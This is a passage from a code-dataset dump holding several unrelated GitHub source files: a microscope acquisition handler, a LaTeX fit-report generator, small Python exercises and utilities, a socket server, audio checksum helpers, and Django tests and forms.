position_coords in sorted(self.positions.items()):\n if position_name not in self.skip_positions:\n self.run_position(position_name, position_coords)\n self.experiment_metadata['skip_positions'] = list(self.skip_positions)\n self.finalize_timepoint()\n self.end_time = time.time()\n self.experiment_metadata.setdefault('durations', []).append(self.end_time - self.start_time)\n if self.write_files:\n with self.experiment_metadata_path.open('w') as f:\n json_encode.encode_legible_to_file(self.experiment_metadata, f)\n run_again = self.skip_positions != self.positions.keys() # don't run again if we're skipping all the positions\n if self._job_futures:\n self.logger.debug('Waiting for background jobs')\n t0 = time.time()\n # wait for all queued background jobs to complete.\n futures.wait(self._job_futures)\n # now get the result() from each future, which will raise any errors encountered\n # during the execution.\n [f.result() for f in self._job_futures]\n self.logger.debug('Background jobs complete ({:.1f} seconds)', time.time()-t0)\n self.logger.info('Timepoint {} ended ({:.0f} minutes after starting)', self.timepoint_prefix,\n (time.time()-self.start_time)/60)\n if run_again:\n return self.get_next_run_time()\n except:\n self.logger.error('Exception in timepoint:', exc_info=True)\n raise\n\n def add_background_job(self, function, *args, **kws):\n \"\"\"Add a function with parameters *args and **kws to a queue to be completed\n asynchronously with the rest of the timepoint acquisition. This will be\n run in a background thread, so make sure that the function acts in a\n threadsafe manner. (NB: self.logger *is* thread-safe.)\n\n All queued functions will be waited for completion before the timepoint\n ends. 
Any exceptions will be propagated to the foreground after all\n functions queued either finish or raise an exception.\n \"\"\"\n self._job_futures.append(self._job_thread.submit(function, *args, **kws))\n\n def configure_timepoint(self):\n \"\"\"Override this method with global configuration for the image acquisitions\n (e.g. camera configuration). Member variables 'scope', 'experiment_metadata',\n 'timepoint_prefix', and 'positions' may be specifically useful.\"\"\"\n pass\n\n def finalize_timepoint(self):\n \"\"\"Override this method with global finalization after the images have been\n acquired for each position. Useful for altering the self.experiment_metadata\n dictionary before it is saved out.\n\n Note that positions added to self.skip_positions are automatically added\n to the metadata, so it is unnecessary to do this here.\n \"\"\"\n pass\n\n def get_next_run_time(self):\n \"\"\"Override this method to return when the next timepoint run should be\n scheduled. Returning None means no future runs will be scheduled.\"\"\"\n return None\n\n def run_position(self, position_name, position_coords):\n \"\"\"Do everything required for taking a timepoint at a single position\n EXCEPT focusing / image acquisition. This includes moving the stage to\n the right x,y position, loading and saving metadata, and saving image\n data, as generated by acquire_images()\"\"\"\n self.logger.info('Acquiring Position: {}', position_name)\n t0 = time.time()\n position_dir = self.data_dir / position_name\n if not position_dir.exists():\n position_dir.mkdir()\n metadata_path = position_dir / 'position_metadata.json'\n if metadata_path.exists():\n with metadata_path.open('r') as f:\n position_metadata = json.load(f)\n else:\n position_metadata = []\n timestamp = time.time()\n\n if self.scope is not None:\n self.scope.stage.position = position_coords\n t1 = time.time()\n self.logger.debug('Stage Positioned ({:.1f} seconds)', t1-t0)\n images, image_names, new_metadata = self.acquire_images(position_name, position_dir,\n position_metadata)\n t2 = time.time()\n self.logger.debug('{} Images Acquired ({:.1f} seconds)', len(images), t2-t1)\n image_paths = [position_dir / (self.timepoint_prefix + ' ' + name) for name in image_names]\n if new_metadata is None:\n new_metadata = {}\n new_metadata['timestamp'] = timestamp\n position_metadata.append(new_metadata)\n if self.write_files:\n self.image_io.write(images, image_paths, self.IMAGE_COMPRESSION)\n with metadata_path.open('w') as f:\n json_encode.encode_legible_to_file(position_metadata, f)\n t3 = time.time()\n self.logger.debug('Images saved ({:.1f} seconds)', t3-t2)\n self.logger.debug('Position done (total: {:.1f} seconds)', t3-t0)\n\n def acquire_images(self, position_name, position_dir, position_metadata):\n \"\"\"Override this method in a subclass to define the image-acquisition sequence.\n\n All most subclasses will need to do is return the following as a tuple:\n (images, image_names, new_metadata), where:\n images is a list of the acquired images\n image_names is a list of the generic names for each of these images\n (not timepoint- or position-specific; e.g. 'GFP.png' or some such)\n new_metadata is a dictionary of timepoint-specific information, such\n as the latest focal plane z-position or similar. 
This will be\n made available to future acquisition runs via the 'position_metadata'\n argument described below.\n\n The images and metadata will be written out by the superclass, and\n must not be written by the overriding subclass.\n\n Optionally, subclasses may choose to enter 'position_name' into the\n self.skip_positions set to indicate that in the future this position\n should not be acquired. (E.g. the worm is dead.)\n\n Parameters:\n position_name: identifier for this image-acquisition position. Useful\n for adding this position to the skip_positions set.\n position_dir: pathlib.Path object representing the directory where\n position-specific data files and outputs should be written. Useful\n only if additional data needs to be read in or out during\n acquisition. (E.g. a background model or similar.)\n position_metadata: list of all the stored position metadata from the\n previous timepoints, in chronological order. In particular, this\n dictionary is guaranteed to contain 'timestamp' which is the\n time.time() at which that acquisition was started. Other values\n (such as the latest focal plane) stored by previous acquisition\n runs will also be available. The most recent metadata will be in\n position_metadata[-1].\n \"\"\"\n raise NotImplementedError()\n\n @classmethod\n def main(cls, timepoint_dir=None, **cls_init_args):\n \"\"\"Main method to run a timepoint.\n\n Parse sys.argv to find an (optional) scheduled_start time as a positional\n argument. Any arguments that contain an '=' will be assumed to be\n python variable definitions to pass to the class init method. (Leading\n '-' or '--' will be stripped, and internal '-'s will be converted to '_'.)\n\n e.g. this allows the following usage: ./acquire.py --dry-run=True --log-level=logging.DEBUG\n\n Parameters:\n timepoint_dir: location of timepoint directory. If not specified, default\n to the parent dir of the file that defines the class that this\n method is called on.\n **cls_init_args: dict of arguments to pass to the class init method.\n \"\"\"\n if timepoint_dir is None:\n timepoint_dir = pathlib.Path(inspect.getfile(cls)).parent\n scheduled_start = None\n for arg in sys.argv[1:]:\n if arg.count('='):\n while arg.startswith('-'):\n arg = arg[1:]\n arg = arg.replace('-', '_')\n # execute the argument in a restricted namespace containing only 'logging', and store the\n # result in the args to pass to the class.\n exec(arg, dict(logging=logging), cls_init_args)\n elif scheduled_start is None:\n scheduled_start = float(arg)\n else:\n raise ValueError('More than one schedule start time provided')\n\n if scheduled_start is None:\n scheduled_start = time.time()\n handler = cls(timepoint_dir, **cls_init_args)\n next_run_time = handler.run_timepoint(scheduled_start)\n if next_run_time:\n print(next_run_time)\n\n","repo_name":"erikhvatum/zplab","sub_path":"rpc_acquisition/scope/timecourse/base_handler.py","file_name":"base_handler.py","file_ext":"py","file_size_in_byte":13035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"15849124130","text":"#!/usr/bin/env python3\n\"\"\"\nScript to make a basic fit result summary pdf\n\"\"\"\n\nimport os\nimport json\nimport sys\n\nfrom argparse import Namespace\n\n#sys.path.append('/tmp/chib_chic_polFW/python/')\n'''\nfrom ...chib_chic_polFW.python.utils.reporting import open_tex_file, create_figure\nfrom ...chib_chic_polFW.python.utils.data_handling import get_dataframe\nfrom ...chib_chic_polFW.python.utils.misc_helpers import fmt_float\n'''\n\nfrom utils.reporting import open_tex_file, create_figure\nfrom utils.data_handling import get_dataframe\nfrom utils.misc_helpers import fmt_float\n\nimport make_fit_result_plots as plots\nfrom make_fit_par_table import create_table, get_vals_uncers, print_val\n\nPRETTY_PAR = {\n # LDMEs\n 'l_3S1_8_c0': r'$\\ldme{\\chi_{c0}}{\\Swave{3}{1}{8}}$',\n 'l_3P0_1_c0': r'$\\ldme{\\chi_{c0}}{\\Pwave{0}{1}}$',\n\n 'l_3S1_1_jpsi': r'$\\ldme{J/\\psi}{\\Swave{3}{1}{1}}$',\n 'l_3S1_8_jpsi': r'$\\ldme{J/\\psi}{\\Swave{3}{1}{8}}$', # derived\n 'l_3PJ_8_jpsi': r'$\\ldme{J/\\psi}{\\Pwave{J}{8}}$', # derived\n\n 'l_3S1_1_psip': r'$\\ldme{\\psi(2S)}{\\Swave{3}{1}{1}}$',\n 'l_3S1_8_psip': r'$\\ldme{\\psi(2S)}{\\Swave{3}{1}{8}}$', # derived\n 'l_3PJ_8_psip': r'$\\ldme{\\psi(2S)}{\\Pwave{J}{8}}$', # derived\n\n 'l_1S0_8_jpsi': r'$\\ldme{J/\\psi}{\\Swave{1}{0}{8}}$',\n 'l_1S0_8_psip': r'$\\ldme{\\psi(2S)}{\\Swave{1}{0}{8}}$',\n\n # LDME ratios\n 'l_r_3PJ_8_1S0_8_jpsi': r'$\\ldmeratio{\\Pwave{J}{8}}{J/\\psi}$',\n 'l_r_3S1_8_1S0_8_jpsi': r'$\\ldmeratio{\\Swave{3}{1}{8}}{J/\\psi}$',\n\n # double ratios\n 'l_rr_3PJ_8_1S0_8_psip_jpsi': r'$\\ldmedr{\\Pwave{J}{8}}$',\n 'l_rr_3S1_8_1S0_8_psip_jpsi': r'$\\ldmedr{\\Swave{3}{1}{8}}$',\n\n # costh ratio norms\n 'norm_costh_1': r'$n_{1}$',\n 'norm_costh_2': r'$n_{2}$',\n 'norm_costh_3': r'$n_{3}$',\n\n # Nuisance params\n 'br_psip_dp': r'\\br{\\psi(2S)}{J/\\psi \\pi\\pi}',\n 'br_psip_mm': r'\\br{\\psi(2S)}{\\mu\\mu}',\n 'br_psip_c2': r'\\br{\\psi(2S)}{\\chi_{c2}}',\n 'br_psip_c1': r'\\br{\\psi(2S)}{\\chi_{c1}}',\n 'br_psip_jpsi': r'\\br{\\psi(2S)}{J/\\psi}',\n 'br_c2_jpsi': r'\\br{\\chi_{c2}}{J/\\psi}',\n 'br_c1_jpsi': r'\\br{\\chi_{c1}}{J/\\psi}',\n 'br_jpsi_mm': r'\\br{J/\\psi}{\\mu\\mu}',\n 'L_ATLAS': r'\\lumi{ATLAS}',\n 'L_CMS': r'\\lumi{ATLAS}'\n}\n\nDERIV_PARS = (\n 'l_3S1_8_jpsi',\n 'l_3PJ_8_jpsi',\n 'l_3S1_8_psip',\n 'l_3PJ_8_psip',\n)\n\nNUISANCE_PARS = (\n 'norm_costh_1',\n 'norm_costh_2',\n 'norm_costh_3',\n 'br_psip_dp',\n 'br_psip_mm',\n 'br_psip_c2',\n 'br_psip_c1',\n 'br_psip_jpsi',\n 'br_c2_jpsi',\n 'br_c1_jpsi',\n 'br_jpsi_mm',\n 'L_ATLAS',\n 'L_CMS',\n)\n\nPREAMBLE = r'''\\documentclass[a4paper, 11pt]{scrartcl}\n\n\\usepackage{graphicx}\n\\usepackage{subfig}\n\\usepackage[margin=2cm]{geometry}\\usepackage{tabulary}\n\\usepackage{multirow}\n\\usepackage{amsmath}\n\n\\newcommand{\\lumi}[1]{$\\mathcal{L}_{\\textrm{#1}}$}\n\\newcommand{\\br}[2]{$\\mathcal{B}(#1 \\to #2)$}\n\\newcommand{\\Swave}[3]{{}^{#1}S_{#2}^{[#3]}}\n\\newcommand{\\Pwave}[2]{{}^{3}P_{#1}^{[#2]}}\n\\newcommand{\\ldme}[2]{\\mathcal{O}^{#1}(#2)}\n\\newcommand{\\ldmeratio}[2]{\\mathcal{R}_{#2}(#1, \\Swave{1}{0}{8})}\n\\newcommand{\\ldmedr}[1]{\\mathcal{RR}(#1, \\Swave{1}{0}{8})}\n'''\n\nSYMBOL_CAPTION = r'''\n$\\mathcal{R}_{\\mathcal{Q}}(X, Y) \\equiv \\ldme{\\mathcal{Q}}{X} / \\ldme{\\mathcal{Q}}{Y}$.\n$\\mathcal{RR}(X, Y) \\equiv \\mathcal{R}_{\\psi(2S)}(X, Y) / \\mathcal{R}_{J/\\psi}(X, Y)$\n'''\n\nPLOTS_TO_USE = (\n 'combined_cs.pdf',\n 'psi_pol.pdf',\n 'chic_ratio_cs.pdf',\n 'costh_ratio_ptm_3p29.pdf',\n 
'costh_ratio_ptm_4p64.pdf',\n 'costh_ratio_ptm_7p10.pdf',\n)\n\nPLOT_DIR = 'plots_for_report'\n\ndef add_fit_plots(plot_dir):\n \"\"\"Add the plots from the plot_dir relative to the result dir\"\"\"\n def _label(pdf_name):\n return pdf_name.replace('.pdf', '').replace('_', r'\\_')\n\n return create_figure({_label(p): f'./{plot_dir}/{p}' for p in PLOTS_TO_USE})\n\ndef pretty_label(par):\n \"\"\"Get a pretty label if one exists\"\"\"\n if par in PRETTY_PAR: return PRETTY_PAR[par]\n return par.replace('_', r'\\_')\n\ndef get_par_indices(res_file):\n \"\"\"Get the parameter indices in the order in which they should appear in the table\"\"\"\n dfr = get_dataframe(res_file, 'parameter_indices')\n all_indices = {p: i for p, i in zip(dfr.columns, dfr.values[0])}\n\n # Sort all the nuiscance parameters to the end\n indices = {}\n for par, idx in all_indices.items():\n if par not in NUISANCE_PARS:\n indices[par] = idx\n\n for par, idx in all_indices.items():\n if par in NUISANCE_PARS:\n indices[par] = idx\n\n return indices\n\ndef add_fit_param_table(res_file):\n \"\"\"Add the fit parameter table from the fit result file (relative to the result dir)\"\"\"\n par_indices = get_par_indices(res_file)\n\n vals_uncers = get_vals_uncers(res_file, par_indices)\n\n rows = [r'parameter & best-fit value \\\\ \\hline']\n have_line = False\n for par, (val, err) in vals_uncers.items():\n if not have_line and par in NUISANCE_PARS:\n # Insert a separation between nuisance params and others\n rows.append(r'\\hline\\hline')\n have_line = True\n\n rows.append(\n fr'{pretty_label(par)} & ${fmt_float(val)} \\pm {fmt_float(err)}$ \\\\'\n )\n\n return create_table(rows, 'l | c', caption='Fit parameter values. ' + SYMBOL_CAPTION)\n\ndef add_deriv_par_table(data):\n \"\"\"Add the table with the derived parameters\"\"\"\n rows = [r'parameter & value \\\\ \\hline']\n\n for par in DERIV_PARS:\n rows.append(fr'{pretty_label(par)} & {print_val(data, par)} \\\\')\n\n return create_table(rows, 'l | c', caption='Derived parameter values at $p_{T}/M = 5$')\n\ndef add_fit_quality_info(res_dir):\n \"\"\"Add some information about the fit quality\"\"\"\n lines = []\n with open(f'{res_dir}/fit_result_info.json', 'r') as infof:\n fit_info = json.load(infof)\n\n lines.append(fr'Number of fitted data points: {fit_info[\"n_data\"]}')\n lines.append(fr'Total number of free parameters: {fit_info[\"n_pars\"]}')\n lines.append(fr'Number of nuisance parameters: {fit_info[\"n_nuis\"]}')\n lines.append(fr'$\\chi^{2}$ / ndf = {fit_info[\"chi2\"]} / {fit_info[\"ndf\"]}')\n\n return r'\\\\'.join(lines)\n\ndef main(args):\n \"\"\"Main\"\"\"\n graphfile = os.path.join(args.resultdir, 'fit_graphs_and_models_nrqcd_global_fit.root')\n\n # Produce the plots\n plot_args = Namespace(graphfile=graphfile, outdir=f'{args.resultdir}/{PLOT_DIR}')\n plots.main(plot_args)\n\n # Scan data loading\n scan_data = get_dataframe(f'{args.resultdir}/param_scan_ptm5.root')\n\n with open_tex_file(f'{args.resultdir}/fit_results_report.tex', PREAMBLE) as texfile:\n texfile.write(add_fit_quality_info(args.resultdir))\n\n texfile.write(add_fit_plots(PLOT_DIR))\n texfile.write('\\n')\n\n texfile.write(add_fit_param_table(f'{args.resultdir}/fit_results_nrqcd_global_fit.root'))\n texfile.write('\\n')\n\n texfile.write(add_deriv_par_table(scan_data))\n\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description='Script to generate an overview fit result pdf')\n parser.add_argument('resultdir', help='Directory containing the fit results')\n\n 
clargs = parser.parse_args()\n main(clargs)\n","repo_name":"nooraangelva/Global-fit-package","sub_path":"chic_pol_global_fit/python/make_fit_result_report.py","file_name":"make_fit_result_report.py","file_ext":"py","file_size_in_byte":7151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"7076173330","text":"# Leer por teclado numeros y guardarlos en una lista. Finaliza cuando se introduce uno negativo. Muestra el máximo y los pares.\n\nesPositivo = True\nlista = []\nwhile(esPositivo):\n numero = int(input(\"Introduzca un numero: \"))\n if numero > 0:\n lista.append(numero)\n else:\n esPositivo = False\n print(\"El numero mas grande es:\",max(lista))\n for i in lista:\n if i % 2 == 0:\n print(i)\n","repo_name":"dd8888/curso-Python3","sub_path":"Ejercicios4/ejercicio1.py","file_name":"ejercicio1.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"37433584599","text":"import random\n\nclass Util:\n @staticmethod\n def generar_numero_aleatorio(minimo, maximo):\n \"\"\"\n Genera un número entero aleatorio entre los valores especificados.\n\n Args:\n minimo (int): Valor mínimo.\n maximo (int): Valor máximo.\n\n Returns:\n int: Número aleatorio entre minimo y maximo.\n \"\"\"\n return random.randint(minimo, maximo)\n","repo_name":"pablo44445/Pruebas_de_software_tarea_1","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"1910001431","text":"import socket\nimport time\nimport concurrent.futures\nimport threading\nimport conn_pool\n\n\nclass Server(object):\n '''\n Socket for listening\n\n How to use:\n create server in main thread,\n call start in new thread,\n call stop in main thread\n '''\n\n def __init__(self, port):\n self.soc = socket.socket()\n #address = (socket.gethostname(), port)\n address = (\"127.0.0.1\", port)\n \n self.soc.bind(address)\n self.soc.listen(5)\n\n self.port = self.soc.getsockname()[1]\n \n self.flag_run = True\n self.conn_list = []\n self.lock = threading.Lock()\n \n def start(self, conn_cb):\n '''start server\n\n this function is blocking, should start in a separate thread'''\n try:\n while self.flag_run:\n conn,addr = self.soc.accept()\n print('received conn: ',addr)\n self.lock.acquire()\n conn_cb(conn)\n\n self.lock.release()\n except Exception as err:\n #print(err)\n pass\n print('server stopped')\n\n def stop(self):\n self.lock.acquire()\n self.flag_run = False\n self.soc.close()\n\n\n\nif __name__ == '__main__':\n server = Server(9999)\n pool = conn_pool.ConnPool(conn_pool.ConnOperator)\n g = lambda: pool.run()\n f = lambda : server.start(pool)\n executor = concurrent.futures.ThreadPoolExecutor(max_workers=4)\n executor.submit(f)\n executor.submit(g)\n input('')\n pool.close()\n server.stop()\n executor.shutdown()\n ","repo_name":"brbrss/bt","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74064865189","text":"from subprocess import check_output\n\nfrom enum import Enum, auto\n\nfrom ... import BIN_FFMPEG\n\n\nclass ChecksumType(Enum):\n PCM_S24LE = auto()\n RAW_STREAM = auto()\n RAW_FILE = auto()\n\n\ndef get_checksum_in_24bit(file_name_full):\n # use ffmpeg to check raw audio stream's sha, converted to 24bit `pcm_s24le`\n # this is sufficient for practically all non-DSD files.\n ffmpeg_output = check_output(\n [\n BIN_FFMPEG,\n \"-i\", file_name_full,\n \"-vn\",\n \"-c:a\", \"pcm_s24le\",\n \"-f\", \"hash\",\n \"-hash\", \"sha256\",\n \"-\"\n ]\n ).decode()\n\n dummy, result = ffmpeg_output.strip().split('=')\n assert dummy == 'SHA256'\n return {\n ChecksumType.PCM_S24LE: result,\n }\n\n\ndef get_checksum_in_raw_stream(file_name_full):\n # for DSD (non-ISO), use the original stream\n ffmpeg_output = check_output(\n [\n BIN_FFMPEG,\n \"-i\", file_name_full,\n \"-vn\",\n \"-c:a\", \"copy\",\n \"-f\", \"hash\",\n \"-hash\", \"sha256\",\n \"-\"\n ]\n ).decode()\n\n dummy, result = ffmpeg_output.strip().split('=')\n assert dummy == 'SHA256'\n return {\n ChecksumType.RAW_STREAM: result,\n }\n\n\ndef get_checksum_in_raw_file(file_name_full):\n # for SACD ISO, use the original file as a whole\n ffmpeg_output = check_output(\n [\n 'shasum',\n \"-a\"\n \"256\",\n file_name_full\n ]\n ).decode()\n\n result = ffmpeg_output[:64]\n return {\n ChecksumType.RAW_FILE: result,\n }\n\n\ndef check_valid_checksum_output(output, ext):\n if ext in {'.m4a'}:\n assert output.keys() == {ChecksumType.PCM_S24LE}\n elif ext in {'.dsf'}:\n assert output.keys() == {ChecksumType.RAW_STREAM}\n elif ext in {'.iso'}:\n assert output.keys() == {ChecksumType.RAW_FILE}\n else:\n raise ValueError\n\n result = list(output.values())[0]\n assert len(result) == 64\n for c in result:\n assert c in '0123456789abcdef'\n","repo_name":"zym1010/roost_music_management","sub_path":"roost/metadata/checksum/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"21612007876","text":"from django.test import TestCase, Client\n\n\nclass AboutURLTests(TestCase):\n\n def setUp(self):\n # Создаем неавторизованный клиент\n self.guest_client = Client()\n\n def test_urls_available(self):\n \"\"\"URL-адресы доступны для всех.\"\"\"\n urls_200 = (\n '/about/author/',\n '/about/tech/',\n )\n url_404 = '/about/unexisting_page/'\n for address in urls_200:\n response = self.guest_client.get(address)\n self.assertEqual(response.status_code, 200)\n response = self.guest_client.get(url_404)\n self.assertEqual(response.status_code, 404)\n\n def test_urls_templates(self):\n \"\"\"URL-адрес использует соответствующий шаблон.\"\"\"\n templates_url_names = {\n '/about/author/': 'about/author.html',\n '/about/tech/': 'about/tech.html',\n }\n for address, template in templates_url_names.items():\n with self.subTest(address=address):\n response = self.guest_client.get(address)\n self.assertTemplateUsed(response, template)\n","repo_name":"NnExe/YaTube","sub_path":"yatube/about/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"74840363109","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom djinn_forms.fields.share import ShareField\nfrom djinn_forms.forms.share import ShareMixin\nfrom djinn_workflow.utils import (\n get_workflow, get_state, apply_transition, set_state)\nfrom pgauth.models import UserGroup\nfrom pgauth.settings import OWNER_ROLE_ID, EDITOR_ROLE_ID, \\\n PROFILE_TYPE_DEPARTMENT_ID\nfrom djinn_forms.fields.role import LocalRoleSingleField\nfrom djinn_forms.fields.relate import RelateField\nfrom djinn_forms.fields.keyword import KeywordField\nfrom djinn_forms.widgets.relate import RelateSingleWidget, RelateWidget\nfrom djinn_forms.forms.relate import RelateMixin\nfrom djinn_forms.widgets.datetimewidget import DateTimeWidget\nfrom djinn_contenttypes import settings\nfrom pgauth.util import get_usergroups_by_user\n\n\nclass PartialUpdateMixin(object):\n\n partial_support = True\n\n def update(self, commit=True):\n\n \"\"\" Allow for updates of only the fields available in the form \"\"\"\n\n for f in self.instance._meta.fields:\n if f.attname in self.fields:\n setattr(self.instance, f.attname,\n self.cleaned_data[f.attname])\n if commit:\n try:\n self.instance.save()\n except:\n return False\n return self.instance\n\n\nclass MetaFieldsMixin(object):\n\n \"\"\" This mixin actually honours the fields setting of the meta info \"\"\"\n\n def __iter__(self):\n\n for name in [name for name in self.fields if\n name in self._meta.fields]:\n yield self[name]\n\n\nclass BaseForm(PartialUpdateMixin, forms.ModelForm):\n\n user_support = True\n\n def __init__(self, *args, **kwargs):\n\n try:\n partial = kwargs.pop('partial')\n except:\n partial = False\n\n try:\n user = kwargs.pop(\"user\")\n except:\n user = None\n\n super(BaseForm, self).__init__(*args, **kwargs)\n\n if partial:\n self.fields = dict((fname, field) for fname, field in\n self.fields.items() if\n fname in self.data.keys())\n\n self.user = user\n\n class Meta:\n exclude = [\"creator\", \"changed_by\"]\n\n\nclass BaseSharingForm(BaseForm, RelateMixin, ShareMixin):\n\n owner = LocalRoleSingleField(\n OWNER_ROLE_ID,\n [\"pgprofile.userprofile\"],\n # Translators: Contentype owner label\n label=_(\"Owner\"),\n required=False,\n widget=RelateSingleWidget(\n attrs={'searchfield': 'title_auto',\n # Translators: content type owner hint\n 'hint': _(\"Select a name\")\n })\n )\n\n shares = ShareField(\n EDITOR_ROLE_ID,\n [\"pgprofile.userprofile\", \"pgprofile.groupprofile\"],\n # Translators: Contentype shares/editors label\n label=_(\"Editors\"),\n # Translators: content shares help\n help_text=_(\"Select users or groups to share editing role\"),\n required=False,\n widget=RelateWidget(\n attrs={'searchfield': 'title_auto',\n # Translators: content type owner hint\n 'hint': _(\"Select a user or group name \")\n })\n )\n\n def __init__(self, *args, **kwargs):\n\n super(BaseSharingForm, self).__init__(*args, **kwargs)\n\n if not self.instance.get_owner(fail_silently=True) and self.user:\n self.fields['owner'].initial = self.user.profile\n self.fields['owner'].widget.initial = True\n\n\nclass BaseContentForm(BaseSharingForm):\n\n # Translators: contenttypes title label\n title = forms.CharField(label=_(\"Title\"),\n max_length=255,\n widget=forms.TextInput())\n\n # Translators: contenttypes usergroup label\n parentusergroup = forms.ModelChoiceField(label=_(\"Add to group\"),\n required=False,\n queryset=UserGroup.objects.none())\n\n\n publish_from = forms.DateTimeField(\n # Translators: contenttypes 
publish_from label\n        label=_(\"Publish from\"),\n        # Translators: contenttypes publish_from help\n        help_text=_(\"Enter a publish-from date and time\"),\n        required=False,\n        widget=DateTimeWidget(\n            attrs={'date_hint': _(\"Date\"),\n                   'time_hint': _(\"Time\"),\n                   'direct': True,\n                   'date_format': settings.DEFAULT_DATE_INPUT_FORMAT\n                   }\n        )\n    )\n\n    publish_to = forms.DateTimeField(\n        # Translators: contenttypes publish_to label\n        label=_(\"Publish to\"),\n        # Translators: contenttypes publish_to help\n        help_text=_(\"Enter a publish-to date and time\"),\n        required=False,\n        widget=DateTimeWidget(\n            attrs={'date_hint': _(\"Date\"),\n                   'time_hint': _(\"Time\"),\n                   'date_format': settings.DEFAULT_DATE_INPUT_FORMAT}\n        )\n    )\n\n    state = forms.ChoiceField(\n        # Translators: contenttypes status label\n        label=_(\"Status\"),\n        # Translators: contenttypes status help\n        help_text=_(\"Select the status\"),\n        choices=[],\n        required=False,\n        widget=forms.RadioSelect)\n\n    userkeywords = KeywordField(\n        # Translators: contenttypes userkeywords label\n        label=_(\"Keywords\"),\n        required=False,\n        # Translators: contenttypes userkeywords help\n        help_text=_(\"Enter keywords separated by spaces\"),\n    )\n\n    related = RelateField(\n        \"related_content\",\n        [],\n        # Translators: contenttypes related label\n        label=_(\"Related content\"),\n        required=False,\n        # Translators: contenttypes related hint\n        help_text=_(\"Select related content\"),\n        widget=RelateWidget(\n            attrs={'hint': _(\"Search relation\"),\n                   'searchfield': 'title_auto',\n                   'template_name':\n                   'djinn_forms/snippets/relatesearchwidget.html',\n                   'search_url': '/content_search/', },\n        )\n    )\n\n    def __init__(self, *args, **kwargs):\n\n        super(BaseContentForm, self).__init__(*args, **kwargs)\n\n        self.init_relation_fields()\n        self.init_share_fields()\n\n        self.fields['parentusergroup'].queryset = self._group_queryset()\n        self.fields['parentusergroup'].choices = self._group_choices()\n\n        self.fields['userkeywords'].show_label = True\n\n        wf = get_workflow(self.instance)\n\n        state = get_state(self.instance)\n\n        # fall back to the workflow's initial state before reading state.name\n        if not state:\n            state = wf.initial_state\n\n        if state.name != 'public':\n            self.fields['state'].initial = \"on\"\n        else:\n            self.fields['state'].initial = None\n\n        self.fields['state'].choices = [\n            (trans.name, trans.name) for trans in\n            state.get_transitions(self.instance, self.user)]\n\n        # If there is no parentusergroup in the instance, and the instance is\n        # a temporary one, set the group to -1.\n        # abuse the title field to assure it is really temporary.\n        #\n        if not self.instance.parentusergroup and self.instance.is_tmp and not self.instance.title:\n            self.initial['parentusergroup'] = -1\n\n        if 'description_feed' in self.fields:\n            self.fields['description_feed'].widget.attrs.update({\n                'placeholder': _(\n                    \"Geef hier de samenvatting voor infoschermen. Indien \"\n                    \"niets ingevuld komt hier een ingekorte versie van het \"\n                    \"tekst-veld.\"\n                )\n            })\n\n    def _group_queryset(self):\n\n        if self.user and self.user.is_superuser:\n            groups = UserGroup.objects.all()\n        elif self.user:\n            groups = get_usergroups_by_user(self.user)\n        else:\n            groups = UserGroup.objects.none()\n\n        groups = groups.exclude(profile_type=PROFILE_TYPE_DEPARTMENT_ID)\n\n        # # if we already have a group set, add it.\n        # #\n        # if self.instance.parentusergroup:\n        #     groups = groups | UserGroup.objects.filter(\n        #         pk=self.instance.parentusergroup_id)\n        #\n        # # if the user is in a usergroup page and add permissions were granted:\n        # if self.data.get('parentusergroup', False):\n        #     groups = groups | UserGroup.objects.filter(\n        #         pk=self.data.get('parentusergroup'))\n\n        groups = groups.filter(is_system=False,\n                               name__isnull=False).exclude(name=\"\").distinct()\n        return groups\n\n    def _group_choices(self):\n\n        \"\"\"Populate group selector. This adds the special case '-1' for no\n        selection made, so we can make sure the user needs to either\n        select a group, or select 'no group'.\n        \"\"\"\n        groups = self._group_queryset()\n\n        groups_as_options = [(group.id, str(group)) for group in groups]\n        # sorting must be done here since groups is a combination of 2 queries\n        groups_as_options = sorted(groups_as_options, key=lambda x: x[1].lower())\n\n        return [\n            # First 2 choices always on top\n            # Translators: djinn_contenttypes group make a choice label\n            (\"-1\", _(\"Make a choice\")),\n            # Translators: djinn_contenttypes group no group label\n            (\"\", _(\"Do not add to a group\"))] + \\\n            groups_as_options\n\n    def save(self, commit=True):\n\n        res = super(BaseContentForm, self).save(commit=commit)\n\n        # if the instance is created, set initial state, else apply\n        # transition\n        #\n        # if self.instance.is_tmp and \"state\" in self.changed_data:\n        if self.instance.is_tmp:\n            if self.cleaned_data['state'] == \"make_private\":\n                set_state(self.instance, \"private\")\n            if \"state\" in self.changed_data:\n                del self.changed_data[self.changed_data.index('state')]\n\n        if commit and \"state\" in self.changed_data:\n\n            apply_transition(self.instance, self.cleaned_data['state'])\n\n        # Somehow the owner never gets set anywhere else, so set it here\n        if commit and 'owner' in self.cleaned_data.keys() and self.cleaned_data['owner']:\n            self.instance.set_owner(self.cleaned_data['owner'].user)\n\n        self.save_relations(commit=commit)\n        self.save_shares(commit=commit)\n\n        return res\n\n    def clean(self):\n\n        super(BaseContentForm, self).clean()\n\n        _data = self.cleaned_data\n\n        # Check publication sanity\n        #\n        if _data.get('publish_to') and _data.get('publish_from'):\n            if _data.get('publish_to') < _data.get('publish_from'):\n                raise forms.ValidationError(\n                    _(u\"Publish to date should be after publish from date\"),\n                    code='invalid')\n\n        if _data.get('publish_from') is None and self.data.get('radiodirect') == \"NotDirect\":\n            raise forms.ValidationError(\n                (\"\"),\n                code='invalid')\n\n        # Remove after publish 